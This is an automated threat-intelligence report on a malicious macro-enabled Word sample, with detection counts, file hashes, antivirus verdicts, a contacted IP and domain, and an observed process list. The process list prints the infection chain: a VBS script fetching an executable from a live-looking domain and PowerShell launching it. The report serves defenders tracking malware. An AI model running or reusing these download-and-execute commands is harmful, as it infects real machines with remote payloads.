327c6d5487cfa96d71c67212d6e19011

Classification: Malicious

327c6d5487cfa96d71c67212d6e19011 is a malicious file sample. Reported by 2 threat sources, last seen 2026-09-02. Detected by 14 antivirus engines.

Detection summary

  • 14 antivirus detections (22% detection ratio)
  • 0 IDS alerts
  • 5 processes observed
  • 1 contacted hosts
  • 1 DNS requests

Blacklist sightings

Description Source First seen Last seen Labels MITRE ATT&CK
Generic Malware Cyber Threat Alliance 2026-09-02 18:00:51 2026-09-02 18:00:51 malicious-activity
Trojan.Generic Hybrid-Analysis 2020-03-23 15:30:57 2020-03-23 15:30:57

Tags

macros-on-open

Sample information

Filenames
327c6d5487cfa96d71c67212d6e19011
File type
Microsoft Word 2007+
Size
261259 bytes
MD5
327c6d5487cfa96d71c67212d6e19011
SHA-1
25fa932f085e354899d3f2c3c73ab7933f6dbcda
SHA-256
4aae0d83b803f80da8841723184837badb9e969136a7013bd297a6ee0251b977
First indexed
2020-03-23 15:30:57
Last updated
2020-03-23 15:30:57

Antivirus detections

EngineDetection
MicroWorld-eScanTrojan.GenericKDZ.58880
BitDefenderTrojan.GenericKDZ.58880
ArcabitTrojan.Generic.DE600
Endgamemalicious (high confidence)
FireEyeTrojan.GenericKDZ.58880
EmsisoftTrojan.GenericKDZ.58880 (B)
CyrenPP97M/Agent.DL.gen!Eldorado
MicrosoftTrojanDropper:O97M/Powdow.ARJ!MTB
GDataMacro.Trojan.Agent.ARC
TACHYONSuspicious/WOX.Obfus.Gen.5
MAXmalware (ai score=88)
Ad-AwareTrojan.GenericKDZ.58880
ZonerProbably W97Obfuscated
FortinetVBA/Agent.ARC!tr

Network contacts

50.87.170.67

DNS requests

customscripts.us

Process list

NameCommand line
WINWORD.EXE/n "C:\327c6d5487cfa96d71c67212d6e19011.doc"
cmd.exe/c c:\Rewi_Cool\Personal.cmd
cscript.execscript //nologo c:\Rewi_Cool\Holiher.vbs http://customscripts.us/ldr_2817175.exe C:\Rewi_Cool\Heri_();.exe
powershell.exepowershell -C Sleep -s 7;Saps 'C:\Rewi_Cool\Heri_();.exe'
ntvdm.exe-i1